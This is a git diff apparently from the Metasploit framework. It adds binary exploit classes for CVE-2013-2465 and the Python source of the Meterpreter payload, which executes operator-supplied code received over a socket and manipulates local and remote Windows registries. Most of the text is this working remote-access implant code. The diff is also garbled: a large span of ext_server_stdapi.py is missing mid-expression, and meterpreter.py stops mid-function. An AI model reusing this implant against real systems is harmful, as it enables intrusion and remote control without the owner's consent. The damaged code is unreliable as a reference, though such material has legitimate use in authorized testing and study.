diff --git a/.gitignore b/.gitignore index 5cc4662fa4311..189d32b78e8e2 100644 --- a/.gitignore +++ b/.gitignore @@ -1,6 +1,8 @@ .bundle # Rubymine project directory .idea +# Sublime Text project directory (not created by ST by default) +.sublime-project # Portable ruby version files for rvm .ruby-gemset .ruby-version @@ -40,3 +42,5 @@ tags *.orig *.rej *~ +# Ignore backups of retabbed files +*.notab diff --git a/Gemfile b/Gemfile index 0fbbd1a78f46e..042c3437bba33 100755 --- a/Gemfile +++ b/Gemfile @@ -17,7 +17,7 @@ group :db do # Needed for Msf::DbManager gem 'activerecord' # Database models shared between framework and Pro. - gem 'metasploit_data_models', '~> 0.16.1' + gem 'metasploit_data_models', '~> 0.16.6' # Needed for module caching in Mdm::ModuleDetails gem 'pg', '>= 0.11' end diff --git a/Gemfile.lock b/Gemfile.lock index 503c913cd9111..c532448b29098 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -23,7 +23,7 @@ GEM i18n (0.6.1) json (1.7.7) metaclass (0.0.1) - metasploit_data_models (0.16.1) + metasploit_data_models (0.16.6) activerecord (>= 3.2.13) activesupport pg @@ -67,7 +67,7 @@ DEPENDENCIES database_cleaner factory_girl (>= 4.1.0) json - metasploit_data_models (~> 0.16.1) + metasploit_data_models (~> 0.16.6) msgpack network_interface (~> 0.0.1) nokogiri diff --git a/data/exploits/CVE-2013-2465/Exploit$MyColorModel.class b/data/exploits/CVE-2013-2465/Exploit$MyColorModel.class new file mode 100755 index 0000000000000..e23f2047fb360 Binary files /dev/null and b/data/exploits/CVE-2013-2465/Exploit$MyColorModel.class differ diff --git a/data/exploits/CVE-2013-2465/Exploit$MyColorSpace.class b/data/exploits/CVE-2013-2465/Exploit$MyColorSpace.class new file mode 100755 index 0000000000000..6627d7a880a39 Binary files /dev/null and b/data/exploits/CVE-2013-2465/Exploit$MyColorSpace.class differ diff --git a/data/exploits/CVE-2013-2465/Exploit.class b/data/exploits/CVE-2013-2465/Exploit.class new file mode 100755 index 0000000000000..442c2bb553ac9 Binary files /dev/null and b/data/exploits/CVE-2013-2465/Exploit.class differ diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py new file mode 100644 index 0000000000000..a1cf7de5b4093 --- /dev/null +++ b/data/meterpreter/ext_server_stdapi.py @@ -0,0 +1,857 @@ +import ctypes +import fnmatch +import getpass +import os +import platform +import shlex +import shutil +import socket +import struct +import subprocess +import sys + +has_windll = hasattr(ctypes, 'windll') + +try: + import pty + has_pty = True +except ImportError: + has_pty = False + +try: + import pwd + has_pwd = True +except ImportError: + has_pwd = False + +try: + import termios + has_termios = True +except ImportError: + has_termios = False + +try: + import _winreg as winreg + has_winreg = True +except ImportError: + has_winreg = False + +class PROCESSENTRY32(ctypes.Structure): + _fields_ = [("dwSize", ctypes.c_uint32), + ("cntUsage", ctypes.c_uint32), + ("th32ProcessID", ctypes.c_uint32), + ("th32DefaultHeapID", ctypes.c_void_p), + ("th32ModuleID", ctypes.c_uint32), + ("cntThreads", ctypes.c_uint32), + ("th32ParentProcessID", ctypes.c_uint32), + ("thPriClassBase", ctypes.c_int32), + ("dwFlags", ctypes.c_uint32), + ("szExeFile", (ctypes.c_char * 260))] + +class SYSTEM_INFO(ctypes.Structure): + _fields_ = [("wProcessorArchitecture", ctypes.c_uint16), + ("wReserved", ctypes.c_uint16), + ("dwPageSize", ctypes.c_uint32), + ("lpMinimumApplicationAddress", ctypes.c_void_p), + ("lpMaximumApplicationAddress", ctypes.c_void_p), + ("dwActiveProcessorMask", ctypes.c_uint32), + ("dwNumberOfProcessors", ctypes.c_uint32), + ("dwProcessorType", ctypes.c_uint32), + ("dwAllocationGranularity", ctypes.c_uint32), + ("wProcessorLevel", ctypes.c_uint16), + ("wProcessorRevision", ctypes.c_uint16),] + +class SID_AND_ATTRIBUTES(ctypes.Structure): + _fields_ = [("Sid", ctypes.c_void_p), + ("Attributes", ctypes.c_uint32),] + +## +# STDAPI +## + +# +# TLV Meta Types +# +TLV_META_TYPE_NONE = ( 0 ) +TLV_META_TYPE_STRING = (1 << 16) +TLV_META_TYPE_UINT = (1 << 17) +TLV_META_TYPE_RAW = (1 << 18) +TLV_META_TYPE_BOOL = (1 << 19) +TLV_META_TYPE_COMPRESSED = (1 << 29) +TLV_META_TYPE_GROUP = (1 << 30) +TLV_META_TYPE_COMPLEX = (1 << 31) +# not defined in original +TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16) + +# +# TLV Specific Types +# +TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0 +TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1 +TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2 +TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3 +TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4 + +TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10 +TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11 +TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12 + +TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25 +TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26 +TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27 + +TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50 +TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51 +TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52 +TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53 +TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54 + +## +# General +## +TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600 +TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601 +TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630 +TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631 + +## +# Fs +## +TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200 +TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201 +TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202 +TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203 +TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204 + +TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220 + +TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230 +TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231 +TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232 +TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233 + +## +# Net +## +TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400 +TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401 + +TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420 +TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421 +TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422 +TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423 + +TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430 +TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431 +TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432 +TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433 + +TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440 +TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441 +TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442 + +# Socket +TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500 +TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501 +TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502 +TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503 +TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504 + +TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530 + +# Registry +TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000 +TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY +TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001 +TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002 +TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003 +TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010 +TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011 +TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012 +TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013 + +# Config +TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040 +TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041 +TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042 +TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043 + +DELETE_KEY_FLAG_RECURSIVE = (1 << 0) + +# Process +TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000 +TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001 +TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002 +TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003 +TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004 +TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005 +TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006 +TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007 +TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008 +TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300 +TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301 +TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302 +TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303 +TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304 +TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305 +TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306 +TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307 + +TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400 +TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401 +TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402 +TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403 +TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404 +TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405 +TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406 + +TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500 +TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502 +TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510 +TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511 +TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512 +TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513 + +TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540 +TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541 +TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542 +TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550 + +## +# Ui +## +TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000 +TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001 +TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002 + +## +# Event Log +## +TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000 +TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001 +TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002 + +TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003 +TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004 + +TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006 +TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007 +TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008 +TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009 +TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010 +TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011 +TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012 +TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013 + +## +# Power +## +TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100 +TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101 + +## +# Sys +## +PROCESS_EXECUTE_FLAG_HIDDEN = (1 << 0) +PROCESS_EXECUTE_FLAG_CHANNELIZED = (1 << 1) +PROCESS_EXECUTE_FLAG_SUSPENDED = (1 << 2) +PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN = (1 << 3) + +PROCESS_ARCH_UNKNOWN = 0 +PROCESS_ARCH_X86 = 1 +PROCESS_ARCH_X64 = 2 +PROCESS_ARCH_IA64 = 3 + +## +# Errors +## +ERROR_SUCCESS = 0 +# not defined in original C implementation +ERROR_FAILURE = 1 + +# Special return value to match up with Windows error codes for network +# errors. +ERROR_CONNECTION_ERROR = 10000 + +def get_stat_buffer(path): + si = os.stat(path) + rdev = 0 + if hasattr(si, 'st_rdev'): + rdev = si.st_rdev + blksize = 0 + if hasattr(si, 'st_blksize'): + blksize = si.st_blksize + blocks = 0 + if hasattr(si, 'st_blocks'): + blocks = si.st_blocks + st_buf = struct.pack(' 3: + break + name = (ctypes.c_char * (ctypes.sizeof(name) * 2)) + tries += 1 + continue + elif result == ERROR_NO_MORE_ITEMS: + result = ERROR_SUCCESS + break + elif result != ERROR_SUCCESS: + break + tries = 0 + response += tlv_pack(TLV_TYPE_KEY_NAME, ctypes.string_at(name)) + index += 1 + return result, response + +@meterpreter.register_function_windll +def stdapi_registry_enum_value(request, response): + ERROR_MORE_DATA = 0xea + ERROR_NO_MORE_ITEMS = 0x0103 + hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] + name = (ctypes.c_char * 4096)() + name_sz = ctypes.c_uint32() + index = 0 + tries = 0 + while True: + name_sz.value = ctypes.sizeof(name) + result = ctypes.windll.advapi32.RegEnumValueA(hkey, index, name, ctypes.byref(name_sz), None, None, None, None) + if result == ERROR_MORE_DATA: + if tries > 3: + break + name = (ctypes.c_char * (ctypes.sizeof(name) * 3)) + tries += 1 + continue + elif result == ERROR_NO_MORE_ITEMS: + result = ERROR_SUCCESS + break + elif result != ERROR_SUCCESS: + break + tries = 0 + response += tlv_pack(TLV_TYPE_VALUE_NAME, ctypes.string_at(name)) + index += 1 + return result, response + +@meterpreter.register_function_windll +def stdapi_registry_load_key(request, response): + root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY) + sub_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY) + file_name = packet_get_tlv(request, TLV_TYPE_FILE_PATH) + result = ctypes.windll.advapi32.RegLoadKeyA(root_key, sub_key, file_name) + return result, response + +@meterpreter.register_function_windll +def stdapi_registry_open_key(request, response): + root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] + base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS) + handle_id = ctypes.c_void_p() + if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS: + response += tlv_pack(TLV_TYPE_HKEY, handle_id.value) + return ERROR_SUCCESS, response + return ERROR_FAILURE, response + +@meterpreter.register_function_windll +def stdapi_registry_open_remote_key(request, response): + target_host = packet_get_tlv(request, TLV_TYPE_TARGET_HOST)['value'] + root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] + result_key = ctypes.c_void_p() + result = ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key)) + if (result == ERROR_SUCCESS): + response += tlv_pack(TLV_TYPE_HKEY, result_key.value) + return ERROR_SUCCESS, response + return ERROR_FAILURE, response + +@meterpreter.register_function_windll +def stdapi_registry_query_class(request, response): + hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] + value_data = (ctypes.c_char * 4096)() + value_data_sz = ctypes.c_uint32() + value_data_sz.value = ctypes.sizeof(value_data) + result = ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None) + if result == ERROR_SUCCESS: + response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data)) + return ERROR_SUCCESS, response + return ERROR_FAILURE, response + +@meterpreter.register_function_windll +def stdapi_registry_query_value(request, response): + REG_SZ = 1 + REG_DWORD = 4 + hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] + value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] + value_type = ctypes.c_uint32() + value_type.value = 0 + value_data = (ctypes.c_ubyte * 4096)() + value_data_sz = ctypes.c_uint32() + value_data_sz.value = ctypes.sizeof(value_data) + result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) + if result == ERROR_SUCCESS: + response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value) + if value_type.value == REG_SZ: + response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00') + elif value_type.value == REG_DWORD: + response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4]) + else: + response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value]) + return ERROR_SUCCESS, response + return ERROR_FAILURE, response + +@meterpreter.register_function_windll +def stdapi_registry_set_value(request, response): + hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] + value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] + value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value'] + value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value'] + result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data)) + return result, response + +@meterpreter.register_function_windll +def stdapi_registry_unload_key(request, response): + root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] + base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + result = ctypes.windll.advapi32.RegUnLoadKeyA(root_key, base_key) + return result, response diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py new file mode 100644 index 0000000000000..b81415a0a71fc --- /dev/null +++ b/data/meterpreter/meterpreter.py @@ -0,0 +1,410 @@ +#!/usr/bin/python +import code +import ctypes +import os +import random +import select +import socket +import struct +import subprocess +import sys +import threading + +has_windll = hasattr(ctypes, 'windll') + +# +# Constants +# +PACKET_TYPE_REQUEST = 0 +PACKET_TYPE_RESPONSE = 1 +PACKET_TYPE_PLAIN_REQUEST = 10 +PACKET_TYPE_PLAIN_RESPONSE = 11 + +ERROR_SUCCESS = 0 +# not defined in original C implementation +ERROR_FAILURE = 1 + +CHANNEL_CLASS_BUFFERED = 0 +CHANNEL_CLASS_STREAM = 1 +CHANNEL_CLASS_DATAGRAM = 2 +CHANNEL_CLASS_POOL = 3 + +# +# TLV Meta Types +# +TLV_META_TYPE_NONE = ( 0 ) +TLV_META_TYPE_STRING = (1 << 16) +TLV_META_TYPE_UINT = (1 << 17) +TLV_META_TYPE_RAW = (1 << 18) +TLV_META_TYPE_BOOL = (1 << 19) +TLV_META_TYPE_COMPRESSED = (1 << 29) +TLV_META_TYPE_GROUP = (1 << 30) +TLV_META_TYPE_COMPLEX = (1 << 31) +# not defined in original +TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16) + +# +# TLV base starting points +# +TLV_RESERVED = 0 +TLV_EXTENSIONS = 20000 +TLV_USER = 40000 +TLV_TEMP = 60000 + +# +# TLV Specific Types +# +TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0 +TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1 +TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2 +TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3 +TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4 + +TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10 +TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11 +TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12 + +TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25 +TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26 +TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27 + +TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50 +TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51 +TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52 +TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53 +TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54 + +TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70 +TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71 +TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72 + +TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300 +TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301 + +TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400 +TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401 +TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402 +TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403 + +TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500 +TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501 + +def generate_request_id(): + chars = 'abcdefghijklmnopqrstuvwxyz' + return ''.join(random.choice(chars) for x in xrange(32)) + +def packet_get_tlv(pkt, tlv_type): + offset = 0 + while (offset < len(pkt)): + tlv = struct.unpack('>II', pkt[offset:offset+8]) + if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type: + val = pkt[offset+8:(offset+8+(tlv[0] - 8))] + if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: + val = val.split('\x00', 1)[0] + elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: + val = struct.unpack('>I', val)[0] + elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: + val = bool(struct.unpack('b', val)[0]) + elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: + pass + return {'type':tlv[1], 'length':tlv[0], 'value':val} + offset += tlv[0] + return {} + +def tlv_pack(*args): + if len(args) == 2: + tlv = {'type':args[0], 'value':args[1]} + else: + tlv = args[0] + data = "" + if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: + data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00' + elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: + data = struct.pack('>III', 12, tlv['type'], tlv['value']) + elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: + data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value']))) + elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: + data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] + elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: + data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] + elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: + data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] + return data + +class STDProcessBuffer(threading.Thread): + def __init__(self, std, is_alive): + threading.Thread.__init__(self) + self.std = std + self.is_alive = is_alive + self.data = '' + self.data_lock = threading.RLock() + + def run(self): + while self.is_alive(): + byte = self.std.read(1) + self.data_lock.acquire() + self.data += byte + self.data_lock.release() + self.data_lock.acquire() + self.data += self.std.read() + self.data_lock.release() + + def is_read_ready(self): + return len(self.data) != 0 + + def read(self, l = None): + data = '' + self.data_lock.acquire() + if l == None: + data = self.data + self.data = '' + else: + data = self.data[0:l] + self.data = self.data[l:] + self.data_lock.release() + return data + +class STDProcess(subprocess.Popen): + def __init__(self, *args, **kwargs): + subprocess.Popen.__init__(self, *args, **kwargs) + + def start(self): + self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None) + self.stdout_reader.start() + self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None) + self.stderr_reader.start() + +class PythonMeterpreter(object): + def __init__(self, socket): + self.socket = socket + self.extension_functions = {} + self.channels = {} + self.interact_channels = [] + self.processes = {} + for func in filter(lambda x: x.startswith('_core'), dir(self)): + self.extension_functions[func[1:]] = getattr(self, func) + self.running = True + + def register_function(self, func): + self.extension_functions[func.__name__] = func + + def register_function_windll(self, func): + if has_windll: + self.register_function(func) + + def add_channel(self, channel): + idx = 0 + while idx in self.channels: + idx += 1 + self.channels[idx] = channel + return idx + + def add_process(self, process): + idx = 0 + while idx in self.processes: + idx += 1 + self.processes[idx] = process + return idx + + def run(self): + while self.running: + if len(select.select([self.socket], [], [], 0)[0]): + request = self.socket.recv(8) + if len(request) != 8: + break + req_length, req_type = struct.unpack('>II', request) + req_length -= 8 + request = '' + while len(request) < req_length: + request += self.socket.recv(4096) + response = self.create_response(request) + self.socket.send(response) + else: + channels_for_removal = [] + channel_ids = self.channels.keys() # iterate over the keys because self.channels could be modified if one is closed + for channel_id in channel_ids: + channel = self.channels[channel_id] + data = '' + if isinstance(channel, STDProcess): + if not channel_id in self.interact_channels: + continue + if channel.stdout_reader.is_read_ready(): + data = channel.stdout_reader.read() + elif channel.stderr_reader.is_read_ready(): + data = channel.stderr_reader.read() + elif channel.poll() != None: + self.handle_dead_resource_channel(channel_id) + elif isinstance(channel, socket._socketobject): + while len(select.select([channel.fileno()], [], [], 0)[0]): + try: + d = channel.recv(1) + except socket.error: + d = '' + if len(d) == 0: + self.handle_dead_resource_channel(channel_id) + break + data += d + if data: + pkt = struct.pack('>I', PACKET_TYPE_REQUEST) + pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write') + pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id) + pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data) + pkt += tlv_pack(TLV_TYPE_LENGTH, len(data)) + pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id()) + pkt = struct.pack('>I', len(pkt) + 4) + pkt + self.socket.send(pkt) + + def handle_dead_resource_channel(self, channel_id): + del self.channels[channel_id] + if channel_id in self.interact_channels: + self.interact_channels.remove(channel_id) + pkt = struct.pack('>I', PACKET_TYPE_REQUEST) + pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close') + pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id()) + pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id) + pkt = struct.pack('>I', len(pkt) + 4) + pkt + self.socket.send(pkt) + + def _core_loadlib(self, request, response): + data_tlv = packet_get_tlv(request, TLV_TYPE_DATA) + if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: + return ERROR_FAILURE + preloadlib_methods = self.extension_functions.keys() + i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess}) + i.runcode(compile(data_tlv['value'], '', 'exec')) + postloadlib_methods = self.extension_functions.keys() + new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods) + for method in new_methods: + response += tlv_pack(TLV_TYPE_METHOD, method) + return ERROR_SUCCESS, response + + def _core_shutdown(self, request, response): + response += tlv_pack(TLV_TYPE_BOOL, True) + self.running = False + return ERROR_SUCCESS, response + + def _core_channel_open(self, request, response): + channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE) + handler = 'channel_create_' + channel_type['value'] + if handler not in self.extension_functions: + return ERROR_FAILURE, response + handler = self.extension_functions[handler] + return handler(request, response) + + def _core_channel_close(self, request, response): + channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value'] + if channel_id not in self.channels: + return 